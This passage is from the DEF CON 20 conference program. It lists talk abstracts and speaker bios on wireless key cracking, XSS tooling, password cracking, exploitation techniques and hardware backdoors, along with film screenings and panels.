Welcome & Making the
DEF CON 20 Badge
The Dark Tangent Founder, DEF CON and Black Hat
LosT Designer of the DC 20 Badges
More info to come.
DEF CON Documentary Trailer
Jason Scott Director, DEF CON Documentary
As you may have heard, in honor of our 20th anniversary, we have a DEF
CON Documentary in the making by none other than Jason Scott of
textfiles.com! At the beginning of this hour he will give you a quick
sneak peek of the film and maybe discuss a few juicy tidbits!
Before, During, and After
Gail Thackeray
Former Assistant Attorney General and Special Counsel,
Arizona Attorney General's Office
Dead Addict
Arizona Attorney General's Office
Dead Addict
When Gail Thackeray first spoke at DEF CON 1 there was no world wide web, state
sponsored computer warfare was the stuff of science fiction, and
international mafias had yet to become major players in computer
crime.Internationally known for her role in Operation Sundevil, the
former prosecuting attorney will discuss the changes in the computer
security legal landscape since she first spoke at DEF CON. She will
also discuss the evolution of the relationship between the computer
security researcher community and law enforcement and government.
Twenty years ago, Dead Addict practically begged Gail Thackeray to
appear at DEF CON, even though she was actively prosecuting several of
his close friends. Since then the government (law enforcement,
military, and intelligence community) has actively participated in DEF
CON; to the point where we’ve been given the moniker ‘FED CON’. Dead
Addict will discuss the evolving relationship between government, the
hacker community, and the civil liberties community. While obviously
at odds with each other in some areas, there is also shared ground
between these groups. This year he was happy to be able invite Gail
again, this time not begging as much, and thankfully she isn’t
prosecuting any of his friends.
Following their talk, Gail and Dead Addict will give a special introduction to our Special
Guest Speaker [REDACTED], [REDACTED] of the [REDACTED] and [REDACTED].
Gail Thackeray is a former Assistant Attorney General and Special
Counsel recently retired from the Arizona Attorney General's Office.
Her career prosecuting electronic crimes included the investigation
and prosecution of early infrastructure attacks on a telephone network
and a power company, as well as numerous fraud, cyberstalking and
intrusion crimes. She participated in the nationwide Secret Service
hacker investigation known as "Operation Sundevil" and attended the
first Defcon Conference. She currently works at the Arizona Counter
Terrorism Information Center as a computer forensic examiner. She has
a B.A. from Vassar College, a J.D. from Syracuse University, and
earned the CFCE forensics certification from the International
Association of Computer Investigative Specialists (IACIS).
20 years ago, Dead Addict helped organize
the first DEF CON. He has been part of the staff ever since. In the years since DEF CON began,
DA has worked for companies large and small, helping secure mobile platforms, operating systems,
and financial infrastructures. In addition to being given the opportunity to speak speak at DEF
CON, Shmoocon, Black Hat, Notacon and others, he constantly feels privileged at the company he has
been able to keep. He is currently a wandering rōnin and aspiring curmudgeon that can be reached at
da@defcon.org or daddict@gmail.com.
DC 101 Thursday Talks
10:00 Breaking Wireless Encryption Keys DaKahuna
Cracking Wireless encryption keys is a fundamental capability that should be in every
penetration tester's skill set. This talk will walk you through the basic steps necessary to break Wireless
Encryption Protocol (WEP) and steps to perform dictionary and brute force attacks against Wi-Fi Protected
Access (WPA & WPA2).
DaKahuna works as a Systems Engineer for a small defense contractor in
the Washington DC metro area. By day he works with large government agencies reviewing network and security architectures,
reviewing information assurance and information security policies and guidance, and advising on matters of policy and
governance. By night he enjoys snooping the airways be it the amateur radio bands or his neighbors wireless networks.
He is a father of two, 24 year Navy veteran and holder of an amateur radio Extra Class license.
11:00 Intro to Digital Forensics: Tools & Tactics Ripshy, Hackajar
Putting up a flag and asking for help on the Internet is not for the faint of heart.
When you simply want to get started with information security, hacking or just playing around with the
vulnerabilities of computer systems, asking the right question to the right person is a crap shoot.
Tired of being on the outside looking in? This 101 talk will help you get your feet wet! It will
provide you the basic knowledge required when starting out in the InfoSec scene. Afraid to ask someone
what the best NMap toggles are? Can't even get your metasploit running? Having trouble decoding your
tcpdumps? We can help! Spend 50 min. with us and jump start the next 50 years of your life!
Ripshy is a long time tinkerer who has been a part of the DEF CON
community for the past 10 years, attending his first con at the Jail bait age of 15. He has worked in various
roles touching multiple points of the info sec rainbow, and is currently working with Sony PlayStation doing magical
things with little more than curiosity and a keyboard. Ripshy is an OG member of the Vegas 2.0 crew, a founding
member of GayHackers, and works as a goon in the DEF CON NOC.
Hackajar has been involved in DEF CON in one form or another for over a decade. He's a
founding member of Vegas 2.0, a Contest Goon, and the brains behind "The Summit". He currently heads a
Silicon Valley Hacker Space and various security shenanigans.
12:00 The Cerebral Source Code Siviak
YOU: are part of the problem. You should count yourself among the ranks of the unprepared. You are
under-educated and fooling yourself. You are sheep, you just don’t know any better… but ignorance is no excuse.
You know that much.
Navigating the world of Social Engineering is often portrayed with the image of “Jedi mind-tricks” and labeled with terms
like “The Art of Deception”… These are all just ploys to convey mysticism, sell books and add value to a skill based on
common sense, perception and the ability to think further than the end of your own nose.
It’s time to remove the wool and learn what Social Engineering is and how it works. Welcome to a crash course in the
oldest CLI…. Bring a helmet.
Siviak: A contributor to DEF CON for 14+ years and a geek for over 30, Siviak is
considered by some as a trusted* (*citation needed) authority in the area of Social Engineering, considered by others to be a
complete asshole and considered by himself, often.
Siviak has talked with, listened to, pontificated at, entertained, debated, challenged, hoodwinked, and
exchanged booze with a great number of us over the years. He is one of the originating voices behind the
Lackey Program, undisputed ruler of the Scavenger Hunt, winner of more black badges than any other
attendee in history and a proud member of 23b.
DEF CON 101
13:00
Panelists:
HighWiz Moderator
Pyr0
Roamer
Lockheed
AlxRogan
LoST
Flipper
DC101 is the Alpha to the closing ceremonies' Omega. It's the place to go to learn about the many facets of Con and to begin your Defconian Adventure. Whether you're a n00b or a long time attendee, DC101 can start you on the path toward maximizing your DEF CON Experiences.
HighWiz █████ █████ █████ ███ ████,
███████████ ██████████ ████.
██████ ████████ ████ ██ ████ ████████ ██ ██████████ ██████ █████████.
██ █████████ █████ ███████ ████ █████████ ███████. ███████ ███████ ███
██ ███ █████████ ████ █████████ █████ █████████. ███████ ██████ █████,
█████████ ██ █████████ ███, ████████ ██ █████. ███ ███ █████ █████
█████ █████████ ███████. █████████ ███████ ██████ ██████. ███████ ██
██████ ████, ██ ████████ █████. ███████ ██ ██████████ █████. █████████
█████████, █████ ███ ████████ █████████, █████ █████ ███████ ██████,
██ ████████████ ██████.
Pyr0 is the asshole who oversees the Contests
and Events at DEF CON. He's been attending since DEF CON 6 and a goon since DEF CON 7. One of
those 3 0 3 peoples and also rolls deep with Security Tribe. Loves good vodka, smart girls,
explosives, and big black . . . guns. Has the ability to tell a man to go to hell so that he
looks forward to the trip. ALSO:DONGS
Roamer is the Senior Goon in charge of the Vendor Area.
He has been on DEF CON staff since DEF CON 8. He was the founder of the DEF CON WarDriving contest the
first 4 years of it's existence and has also run the slogan contest in the past. Roamer is the lead
guitarist in the Goon Band, Recognize (despite what you may read in Gm1's bio). Although having no
actual skills his ability to out-drink virtually every Goon and attendee under the table has gained
him massive prominence in the scene and elevated him to the lofty station you see him in today.
Lockheed is the Sr. Goon in charge of the DEF
CON Network Operations Group since DEF CON 4. Professionally, Lock has over 25 years of experience in
the technology field. He's had jobs ranging from lowly tech writer, mainframe operator, product
engineer, product marketing manager, and is currently Sr Director in charge of the Global IT
Group for Sony PlayStation Worldwide Studios, managing staff across the globe. He's been in
the video game industry for almost 10 years now.
AlxRogan was born and raised in the Oil and Gas industry,
and has worked (off and on) there since 1995. In his work experience, he has consulted for energy
generating companies, health care providers, US and local government, and education/research
institutions. He is currently the Information Security Architect for a mid-size oil and gas
company in Houston. He also enjoys mopery.
LoST: With a background in mathematics and robotics LosT spends his
free time between calculating how to take over the world and building the robots to accomplish it. Deciding to
teach others how to create robot overlords, he created the Hardware Hacking Village for the DEF CON community
with Russ in an effort to get more people involved with hardware. Fearing competition LosT devised the
Mystery Challenge to confuse and confound those who would rise up against him- eventually becoming the
creator of the badges to that same end. Really he just wants to juggle and read books these days, or
watch MST3K with Tom.
Flipper is the new guy on the panel. DEF CON 19 was his first
DEF CON, and he was on the team that went on to victory in the Scavenger Hunt. Last year he applied his
experience from robotics competitions to survive several days of sleepless insanity. He is back again
this year to talk about the whole DEF CON experience from the perspective of a newcomer. His day job
finds him being an expert in underwater robotics.
Twitter: @NickFlipper
Flipper on G+
14:00 Screw the Planet, Hack the Job! Roamer, Lockheed, AlxRogan
Have you ever wondered how you can translate your mad skillz into an actual job? Does coming to
DEF CON even help you get there? Four members of the DEF CON staff will astound you with the stories of how they
took their experiences at DEF CON and turned them into the jobs of their dreams. Despite using their DEF CON
experiences to obtain these jobs, they represent four completely different industries: Government, Energy,
Health Care, and the Video Game Industry in a variety of different job functions. Learn from their experience
and find out what they look for (from the community?) when they need to fill positions in their respective industries.
Roamer is the Senior Goon in charge of the Vendor Area. He has been on
DEF CON staff since DEF CON 8. He was the founder of the DEF CON WarDriving contest the first 4 years of it's
existence and has also run the slogan contest in the past. Roamer is the lead guitarist in the Goon Band,
Recognize (despite what you may read in Gm1's bio). Although having no actual skills his ability to
out-drink virtually every Goon and attendee under the table has gained him massive prominence in the
scene and elevated him to the lofty station you see him in today.
Lockheed is the Sr. Goon in charge of the DEF CON Network Operations Group since DEF CON 4.
Professionally, Lock has over 25 years of experience in the technology field. He's had jobs ranging from lowly
tech writer, mainframe operator, product engineer, product marketing manager, and is currently Sr Director in
charge of the Global IT Group for Sony PlayStation Worldwide Studios, managing staff across the globe. He's
been in the video game industry for almost 10 years now.
AlxRogan was born and raised in the Oil and Gas industry, and has worked (off and on)
there since 1995. In his work experience, he has consulted for energy generating companies, health care
providers, US and local government, and education/research institutions. He is currently the Information
Security Architect for a mid-size oil and gas company in Houston.
15:00 HF Skiddies Suck, Don't Be One. Learn Some Basic Python Terrence "tuna" Gareau
Fuck a bunch of skiddie tools acquired from bobo forums. One does not have to be a master
to write their own shit. Yoda said it best get off your dick and write yourself some Python (Just don't show
it to Highwiz he might bite it). Also always remember to stay in the the wizards good graces or you will find
yourself publicly humiliated. You can come to this talk and find out how to be humiliated publicly but also:
learn some python from a hackers perspective. Oh yea: Dongs, Schlongs, and Turds
Terrence "tuna" Gareau If drinking and getting fat was a job
Terrence “tuna” Gareau would be a rich and happy person. He has spent his years growing up with a terminal on
his dong. There is nothing more satisfying to this poor bloke then hacking something to find a new purpose or
use for it. This love for hacking has gone so far that he does not know how to interact with humans or the
opposite sex and has left him a 26 year old virgin.
16:00 Hacking the Hackers: How Firm is Your Foundation? LoST
Since this is DC101, I've got some things I want to get off my chest- a brief overview
of 'foundational' hacker knowledge that I personally believe all hackers should have or would want- from
subculture references to numerical oddities, this will be a meat space core dump of an ADD-OCD hacker.
(ADD-OCD: I'm constantly changing what I'm completely obsessed about.) Topics will include mathematics,
linguistics, programming, hardware, DEF CON, robotics, and more. A veritable cornucopia of fun. Or not.
LoST: With a background in mathematics and robotics LosT
spends his free time between calculating how to take over the world and building the robots to accomplish it.
Deciding to teach others how to create robot overlords, he created the Hardware Hacking Village for the DEF CON
community with Russ in an effort to get more people involved with hardware. Fearing competition LosT devised
the Mystery Challenge to confuse and confound those who would rise up against him- eventually becoming the creator
of the badges to that same end. Really he just wants to juggle and read books these days, or watch MST3K with Tom.
14:10 Introduction to Lockpicking and Bypassing Physical Security Dr. Tran
Everyone relies on their locks to keep things secure. From front doors
to filing cabinets, they give us the sense of security that no one else can get inside without
the proper key. However, in reality, most locks can be picked trivially without any evidence of
exploitation. You will learn how and why lockpicking works as well as what manufacturers have done
to protect against such shenanigans.
Dr. Tran is a security professional in Switzerland by day,
but some say he’s a super-secret agent by night. He’s been tinkering and taking apart technology since
childhood, but hasn’t necessary figured out how to reassemble them. When Robert is not wrenching on motor
vehicles or traveling the world, he’s picking locks. He’s been an active member of TOOOL for over 3
years and has taught at conferences including Shmoocon, CarolinaCon, NotaCon, Security BSides, QuahogCon,
HOPE, & DEF CON.
Movie Night With The Dark Tangent: "Code2600" + Q&A With the Director
Jeremy Zerechak Director, Code2600
DEF CON is happy to announce Code 2600 will be showing at DEF CON 20! We will be the first hacker con to have the film shown and we are pretty excited about it. The filmmaker will be present and doing a Q & A after the screening! Check out code2600.com for more info!
About the film:
CODE 2600 documents the rise of the Information Technology Age as told through the events and people who helped
build and manipulate it. The film explores the impact this new connectivity has on our ability to remain human while
maintaining our personal privacy and security. As we struggle to comprehend the wide-spanning socio-technical fallout
caused by data collection and social networks, our modern culture is trapped in an undercurrent of cyber-attacks, identity
theft and privacy invasion. Both enlightening and disturbing, CODE 2600 is a provocative wake-up call for a society caught
in the grips of a global technology takeover.
The Cast:
Bruce Schneier,
Chief Security Technology Officer, BT
Jeff Moss,
Founder Def Con and Black Hat
Marcus Ranum,
Chief Security Officer, Tenable Security
Jennifer Granick,
Civil Liberties Director, EFF
Dr. Bob Lash,
Original Member of the Homebrew Computer Club
Eric Michaud,
Founder, Pumping Station One
Gideon Lenkey,
Security, CEO RA Security Systems
Lorrie Cranor,
Cylab, Carnegie Mellon University
Phil Lapsley,
Phone Phreaking Expert, Author
Robert Vamosi,
Computer Security Journalist, Author
Wallace Wang,
Author, "Steal This Computer Book"
Gideon Lenkey,
Co-Founder, Ra Security Systems
Movie Night With The Dark Tangent: "Reboot" + Q&A With the Filmmakers and Actors
Joe Kawasaki Writer/Director, Reboot
Sidney Sherman Producer, Reboot
Actors To Be Announced
We are very excited to announce an Exclusive Sneak Preview screening of the film Reboot at DEF CON 20! Here is
a peek at the premise from an article on the film:
"Set within a dystopian world that is a collision between technology and humanity, "Reboot" touches upon many of the current social
and political concerns that arise from becoming more and more intertwined with the virtual.
In contemporary Los Angeles, a young female hacker (Stat) awakens from unconsciousness to find an iPhone glued to her hand
and a mysterious countdown ticking away on the display. Suffering from head trauma, and with little recollection of who she
is or what is happening, Stat races against time to figure out what the code means, and what unknown event the pending
zero-hour will bring."
We are also excited that the filmmakers and lead cast members will be on hand at DEF CON for a Q&A session along
with the screening! We'll have more info as this solidifies.
If you are looking for a fun gaming challenge, Reboot has a cool alternate reality game in which you can participate
as well! Find more info at http://www.rebootfilm.com/scoreboard.
Movie Night with The Dark Tangent:
"We Are Legion: The Story
of the Hacktivists"
"We Are Legion: The Story of the Hacktivists” is a documentary that takes us inside the world of Anonymous,
the radical “hacktivist” collective that has redefined civil disobedience for the digital age. The
film explores the historical roots of early hacktivist groups like Cult of the Dead Cow and Electronic
Disturbance Theater and then follows Anonymous from 4chan to a full-blown movement with a global reach,
one of the most transformative of our time.
We might even get lucky and have some cast and crew in attendance for a short Q&A!
Movie Night With The Dark Tangent: "21" + Q&A With "MIT Mike" Aponte
"MIT Mike" Aponte Former Member, MIT Blackjack Team
Join us for a screening of the hit movie "21" and stick around for a Q&A session with "MIT Mike" Aponte, the real-life inspiration for the character "Jason Fisher".
"MIT Mike" Aponte Mike Aponte is a world-renowned blackjack player, gaming consultant and professional speaker. Mike was the leader of the MIT Blackjack Team, a high stakes card-counting team that legally won millions at 21 using mathematics and an ingenious approach. Mike was one of the main characters in the New York Times bestseller, Bringing Down the House, which inspired the major motion picture, 21.
Drawing on 20 years of professional blackjack experience, Mike teach players how to turn 21 into a lucrative money maker. Blackjack is unique because unlike other casino games, it is a true game of skill. The decisions you make actually determine whether you will win or lose over the long run. The beauty of blackjack is that for every playing decision there is one and only one correct play, and for every betting decision there is one and only one optimal bet.
Professional blackjack is both an art and science. In addition to learning the optimal strategies you must also develop the skills in order to apply the knowledge effectively. Mike teaches his clients how to develop a high skill level using the same training methods and techniques he used when he managed the MIT Team. If you're tired of losing to the casinos or are entrepreneurial minded and seeking a new and exciting skill, Mike can help you turn blackjack into a winning investment.
Accomplishments:
In addition to being one of the MIT Blackjack Team’s most successful players, Mike was also responsible for recruiting, player development and strategic analysis. In 2004, Mike won the first World Series of Blackjack championship competing against the best blackjack players in the world. Mike speaks professionally for corporations and universities and also consults on the mathematics of gaming
Shared Values, Shared Responsibility
General Keith B. Alexander Commander, US Cyber Command
(USCYBERCOM) and Director, National Security AgenCy/Chief, Central Security Service (NSA/CSS)
We as a global society are extremely vulnerable and at risk for a catastrophic cyber event.
Global society needs the best and brightest to help secure our most valued resources in cyberspace:
our intellectual property, our critical infrastructure and our privacy. DEF CON has an important place in computer security.
It taps into a broad range of talent and provides an unprecedented diversity of experiences and expertise to solve tough problems.
The hacker community and USG cyber community share some core values: we both see the Internet as an immensely positive force; we
both believe information increases in value by sharing; we both respect protection of privacy and civil liberties;
we both believe in the need for oversight that fosters innovation, doesn’t pick winners and losers, and retains
freedom and flexibility; we both oppose malicious and criminal behavior. We should build on this common
ground because we have a shared responsibility to secure cyberspace.
General Keith B. Alexander is the Commander, U.S. Cyber Command (USCYBERCOM) and
Director, National Security Agency/Chief, Central Security Service (NSA/CSS). As Commander, USCYBERCOM, he oversees planning, coordinating and
conducting operations and defense of DoD computer networks. As Director, NSA/Chief, CSS, he oversees a DoD agency with national foreign
intelligence, combat support, and U.S. national security information system protection responsibilities. GEN Alexander holds a B.S. from the
U.S. Military Academy, a M.S. in Business Administration from Boston University, a M.S. in Systems Technology (Electronic Warfare) and a M.S.
in Physics from the Naval Post Graduate School, and a M.S. in National Security Strategy from the National Defense University.
Owning Bad Guys {And Mafia} With Javascript Botnets
Chema Alonso Security Researcher, Informatica64
Manu "The Sur" Penetration Tester, Informatica64
Man in the middle attacks are still one of the most powerful techniques for owning machines.
In this talk MITM schemas in anonymous services are going to be discussed. Then attendees will see how easily a
botnet using javascript can be created to analyze that kind of connections and some of the actions people behind
those services are doing... in real. It promises to be funny.
Chema Alonso is a Security researcher with Informatica64, a Madrid-based
security firm. Chema holds respective Computer Science and System Engineering degrees from Rey Juan Carlos University
and Universidad Politècnica de Madrid. During his more than eight years as a security professional, he has
consistently been recognized as a Microsoft Most Valuable Professional (MVP). Chema is a frequent speaker at
industry events (Microsoft Technet / Security Tour, AseguraIT) and has been invited to present at information
security conferences worldwide including Yahoo! Security Week, Black Hat Briefings, ShmooCON, DeepSec, HackCON,
Ekoparty and RootedCon - He is a frequent contributor on several technical magazines in Spain, where he is
involved with state-of-the-art attack and defense mechanisms, web security, general ethical hacking
techniques and FOCA.
Twitter: @chemaalonso
http://www.elladodelmal.com
www.informatica64.com
Manu has been working in all security areas since he got into Informatica64.
He is a security pentester, a developer coding in projects like FOCA and a very good security research in areas such as
Connection String Parameter Pollution Attacks or malware. He has the honor of being the man behind some of the most
powerful "C# spaghetti lines" of FOCA.
The Darknet of Things, Building Sensor Networks That Do Your Bidding
Anch
Omega
Omega
The Internet of Things... It is coming, wearing hardware that communicates across the Internet is
starting to become a reality, chips are getting smaller, as a society we are connected all the time... Building
these devices is easier then we thought, putting them onto a network that is ours... EVEN BETTER! Come
experience the Darknet of Things. Learn what we built, how we built it, and why. Learn how to get involved
with a new community project, see what some of the DEF CON groups have been working on. Most importantly,
learn how you can connect to the Darknet of Things.
Anch - Just a lowly hacker out in Oregon, POC for DC503, Designer
of the Network, and happily connected to the matrix.
Twitter: @boneheadsanon
http://www.dcgdark.net
Omega - Hardware hacker extraordinare. Member of DC503, Designer of things, and thinks he
should have taken the RED pill.
Drones!
Chris Anderson Editor-in-Chief, Wired Magazine
Thanks to the plummeting cost of powerful motion sensors
like those found in smartphones, the technology to create
military-class autopilots is available to all. Over the past five
years, the DIY Drones community has created a series of open source
unmanned aerial vehicles (UAV), from fully-autonomous planes,
helicopters, quadcopters, hexacopters, rovers and more, which cost
just a few hundred dollars -- less than 1% the cost of equivalent
military drones. As a result there are now more than 10,000 of them in
use -- more than the US Military. As DIY drones go mainstream, what
are the practical applications that will emerge, and the legal,
ethical and economic implications? How does open source change the
regulatory aspects of drones? And will the rise of "personal drones"
have a similar social impact as "personal computers" did?
Chris Anderson is the Editor in Chief of Wired. He is the author
of the New York Times bestsellers The Long Tail and FREE: The Future
of a Radical Price, and the forthcoming Makers: The New Industrial
Revolution. He is also founder of 3D Robotics, an open source robotics
company.
<ghz or bust: DEF CON
atlas 0f d00m c0rp0ration
Wifi is cool and so is cellular, but the real fun stuff happens below the GHz line.
Medical systems, mfg plant/industrial systems, cell phones, power systems, it's all in there!
atlas and some friends set out to turn pink girltech toys into power-systems-attack tools. Through several turns
and changes, the cc1111usb project was born, specifically to make attacking these systems easier for all of you.
With a $50 usb dongle, the world of ISM sub-GHz is literally at your fingertips.
New and improved! If you missed it at shmoocon, here's your chance to see the intro to this fun new world.
If you caught it at shmoo, come to the talk and prove your <ghz prowess and wirelessly hack a special pink girl's toy target!
atlas is a doer of stuff. Inspired by the illustrious sk0d0,
egged on by invisigoth of kenshoto, atlas has done a lot of said 'stuff' and lived to talk about it.
Whether he's breaking out of virtual machines, breaking into banks, or breaking into power systems,
atlas is always entertaining, educational and fun.
Twitter: @at1as
Blind XSS
Adam "EvilPacket" Baldwin Chief Security Officer, &yet
This talk will announce the release and demonstrate the xss.io toolkit. xss.io is a platform to help ease cross-site
scripting (xss) exploitation and specifically for this talk identification of blind xss vectors. Think drag and drop
exploits post xss vuln identification. For blind xss, xss.io is a callback and hook manager for intel collected by
executed and non-executed but accessed payloads.
Adam "EvilPacket" Baldwin Adam Baldwin has over 10+ years of mostly
self-taught computer security experience and currently is the Chief Security Officer at &yet. He at one
time possessed a GCIA and if his CPE's are up to date should still have a CISSP. Prior to starting at &yet,
Adam operated a security consultancy, nGenuity and worked for Symantec. Adam is a minor contributor to the W3AF
project, creator of the DVCS pillaging toolkit, helmet: the security header middleware for node.js, and has
previously spoken at DEF CON, Toorcon, Toorcamp, Djangcon, and JSconf.
Twitter: @adam_baldwin
http://evilpacket.net
Should the Wall of Sheep Be Illegal? A Debate Over Whether and How Open WiFi Sniffing Should Be Regulated
Kevin Bankston Senior Counsel & Director of Free Expression, Center for Democracy & Technology
Matt Blaze Director, Distributed Systems Lab at the University of Pennsylvania
Jennifer Granick General Counsel, Worldstar, LLC
Matt Blaze Director, Distributed Systems Lab at the University of Pennsylvania
Jennifer Granick General Counsel, Worldstar, LLC
Prompted by the Google Street View WiFi sniffing scandal, the question of whether and how the law regulates interception of unencrypted wireless communications has become a hot topic in the courts, in the halls of the FCC, on Capitol Hill, and in the security community. Are open WiFi communications protected by federal wiretap law, unprotected, or some strange mix of the two? (Surprise: it may be the last one, so you'll want to come learn the line between what's probably illegal sniffing and what's probably not.)
More importantly, what *should* the law be? Should the privacy of those who use WiFi without encryption be protected by
law, or would regulating open WiFi sniffing pose too great a danger to security research and wireless innovation, not to
mention DEF CON traditions like the Wall of Sheep? Do we need to protect the sheep from the hackers, or the hackers from
the law, or can we do both at the same time? Join legal expert Kevin Bankston and technical expert Matt Blaze as they
square off in a debate to answer these questions, moderated by Jennifer Granick. (Surprise: the lawyer is the one arguing
for regulation.)
Kevin Bankston is Senior Counsel and Director of the Free Expression Project at
the Center for Democracy & Technology, a Washington, DC-based non-profit organization dedicated to promoting democratic
values and constitutional liberties in the digital age. Prior to joining CDT in February 2012, he was a Senior Staff
Attorney for the Electronic Frontier Foundation (EFF) specializing in free speech and privacy law with a focus on
government surveillance, Internet privacy, and location privacy. At EFF, he regularly litigated issues surrounding
location privacy and electronic surveillance, and was a lead counsel in EFF’s lawsuits against the National Security
Agency and AT&T challenging the legality of the NSA’s warrantless wiretapping program. From 2003-05, he was EFF's
Equal Justice Works/Bruce J. Ennis Fellow, studying the impact of post-9/11 anti-terrorism surveillance initiatives on
online privacy and free expression. Before joining EFF, he was the Justice William J. Brennan First Amendment Fellow
for the American Civil Liberties Union, where he litigated Internet-related free speech cases. He received his J.D.
in 2001 from the University of Southern California and his undergraduate degree from the University of Texas.
Twitter: @kevinbankston
http://www.cdt.org
Matt Blaze directs the Distributed Systems Lab at the University of
Pennsylvania, where he teaches hackers to be scientists and scientists to be hackers.
Twitter: @mattblaze
http://www.crypto.com
Jennifer Granick is the General Counsel of Worldstar, LLC. Prior to joining
WorldStarHipHop, Granick was an attorney at ZwillGen PLLC from 2010-2012 and the Civil Liberties Director at the
Electronic Frontier Foundation from 2007-2010. Previously, Granick served as the Executive Director of the Center for
Internet and Society at Stanford Law School where she was a lecturer in law. She founded and directed the Law School's
Cyberlaw Clinic where she supervised students in working on some of the most important cyberlaw cases that took place
during her tenure. She is best known for her work with intellectual property law, free speech, privacy, and other
things relating to computer security, and has represented several high profile hackers.
Twitter: @granick
http://www.granick.com
Cryptohaze Cloud Cracking
Bitweasil Lead Developer, Cryptohaze Tools
Bitweasil goes through the latest developments in the Cryptohaze GPU based password
cracking suite. WebTables is a new rainbow table technology that eliminates the need to download
rainbow tables before using them, and the new Cryptohaze Multiforcer is an open source, GPLv2, network
enabled platform for password cracking that is easy to extend with new algorithms for specific targets.
The Cryptohaze Multiforcer supports CUDA, OpenCL, and CPU code (SSE, AVX, etc). All of this is aimed at
either the pentester who can't spray hashes to the internet, or the hacker who would rather not broadcast
what she obtained to pastebin scrapers..
Bitweasil Bitweasil is the primary developer on the open source
Cryptohaze tool suite, which implements network-clustered GPU accelerated password cracking (both brute
force & rainbow tables). He has been working with CUDA for over 4 years (since the first public release
on an 8800GTX), OpenCL for the past 2 years, and enjoys SSE2 as well. Bitweasil also rescues ferrets.
Twitter:@Bitweasil
http://www.cryptohaze.com
Overwriting the Exception Handling Cache PointerDwarf Oriented Programming
Rodrigo Rubira Branco Vulnerability & Malware Research Labs, Qualys
James Oakley Programmer
Sergey Bratus Research Ass't Professor, Comp. Science, Dartmouth College
This presentation describes a new technique for abusing the DWARF exception handling architecture used
by the GCC tool chain. This technique can be used to exploit vulnerabilities in programs compiled with or linked to
exception-enabled parts. Exception handling information is stored in bytecode format, executed by a virtual machine
during the course of exception unwinding and handling. We show how a malicious attacker could gain control of those
structures and inject bytecode for malicious purposes. This virtual machine is actually Turing-complete, which means
that it can be made to run arbitrary attacker logic.
Rodrigo Rubira Branco (BSDaemon) is the Director of Vulnerability & Malware
Research at Qualys. In 2011 he was honored as one of the top contributors to Adobe Vulnerabilities in the past 12 months.
Previously, as the Chief Security Research at Check Point he founded the Vulnerability Discovery Team (VDT) and released
dozens of vulnerabilities in many important software. Previous to that, he worked as Senior Vulnerability Researcher in
COSEINC, as Principal Security Researcher at Scanit and as Staff Software Engineer in the IBM Advanced Linux Response
Team (ALRT) also working in the IBM Toolchain (Debugging) Team for PowerPC Architecture. He is a member of the RISE
Security Group and is the organizer of Hackers to Hackers Conference (H2HC), the oldest security research conference
in Latin America. Accepted speaker in lots of security and open-source related events as H2HC, HITB, XCon, VNSecurity,
OLS, DEF CON, Hackito, Ekoparty, Troopers and others.
James Oakley came to computer programming by way of microcontroller
programming. He enjoys hands-on work with low level systems. His interests include computer graphics, digital
electronics, security, and operating systems. In his unprofessional time he enjoys backpacking, science fiction,
and designing games. He graduated from the Computer Science program at Dartmouth College.
Sergey Bratus is a Research Assistant Professor of Computer Science at
Dartmouth College. He tries to help fellow academics to understand the value and relevance of hacker research.
He enjoys wireless and wired network hacking, kernel rootkits and hardening patches, and spoke on various topics
at Shmoocon, Toorcon, DEF CON, and Black Hat. He has a Ph.D. in Mathematics from Northeastern University,
and worked at BBN Technologies on natural language processing research before coming to Dartmouth.
Twitter: @sergeybratus
Exploit Archaeology: Raiders of the Lost Payphones
Josh Brashars Penetration Tester, Member DC 949
Payphones. Remember those? They used to be a cornerstone of modern civilation,
available at every street corner, gas station, or any general place of commerce. For decades, hackers
and phone phreaks crowded around them as an altar to high technology and a means to "reach out and touch someone".
Fast forward to today, most people have mobile phones. Payphones installed decades earlier are now more
of a memorial to a time long gone by. Covered with grime and graffitti, forgotten, relegated to the realm
of drug dealers and other undesirables. But they're still around, and they're more vulnerable
than ever.
This talk will review modern hacking techniques applied to retro hardware. We'll cover owning payphones and
how they can be retrofitted with new technologies to turn them into the ultimate low profile hacking platform
to compromise your organizations network. There will be demos of payphone hacking on stage, as well as using
the payphone to intercept voice phone traffic. We'll also reveal a new tool to automate the exploitation of
payphones and relate how (like with all forms of archaelogoy) learning about old platforms can help us secure
modern architecture.
Joshua Brashars Joshua Brashars is a penetration tester
and a member of DC949. He prefers to break things instead of make them.
Joshua has presented at several notable security conferences, including
Toorcon San Diego, Toorcon Seattle, Thotcon, Baythreat and HOPE. Joshua
has also contributed to several titles with Syngress Publishing.
Twitter: @savant42
Hardware Backdooring is Practical
Jonathan Brossard Toucan System
This presentation will demonstrate that permanent backdooring of hardware is practical.
We have built a generic proof of concept malware for the intel architecture, Rakshasa, capable of infecting
more than a hundred of different motherboards. The first net effect of Rakshasa is to disable NX permanently
and remove SMM related fixes from the BIOS, resulting in permanent lowering of the security of the backdoored
computer, even after complete earasing of hard disks and reinstallation of a new operating system. We shall
also demonstrate that preexisting work on MBR subvertions such as bootkiting and preboot authentication
software bruteforce can be embedded in Rakshasa with little effort. More over, Rakshasa is built on top of
free software, including the Coreboot project, meaning that most of its source code is already public. This
presentation will take a deep dive into Coreboot and hardware components such as the BIOS, CMOS and PIC
embedded on the motherboard, before detailing the inner workings of Rakshasa and demo its capabilities.
It is hoped to raise awareness of the security community regarding the dangers associated with non open
source firmwares shipped with any computer and question their integrity. This shall also result in
upgrading the best practices for forensics and post intrusion analysis by including the afore
mentioned firmwares as part of their scope of work.
Jonathan Brossard is a security research engineer. Born in France,
he's been living in Brazil and India, before currently working in Australia. With about 15 years of practice
of assembly, he is specialised in low level security, from raw sockets to cryptography and memory corruption
bugs. He is currently working as CEO and security consultant at the Toucan System security company. His
clients count some of the biggest Defense and Financial Institutions worldwide. Jonathan is also the
co-organiser of the Hackito Ergo Sum conference (HES) in France.
Twitter: @endrazine
Facebook: toucansystem
DIY Electric Car
Dave Brown
Electric Vehicles are an exciting area of developing technology entering
the mainstream market. Every major manufacturer is working on new hybrid and electric vehicles
but prices will be high and options few for years to come.
As with many industries, a DIY approach can yield similar results for much less cost, while creating
something truly unique.
This talk will explore the possibilities and procedures involved in creating your own electric vehicle.
Topics addressed will include the whys and hows, with an emphasis on the options available to tailor your
conversion to match your time, budget, and performance needs.
Dave Brown is an IT Security Consultant with Booz Allen Hamilton. In
his free time he tries to build stuff, and is particularly interested in alternative energy. In 2010 he converted
a ’74 VW Beetle to run on electricity, improving performance and eliminating the need to gas up.
Tenacious Diggity: Skinny Dippin' in a Sea of Bing
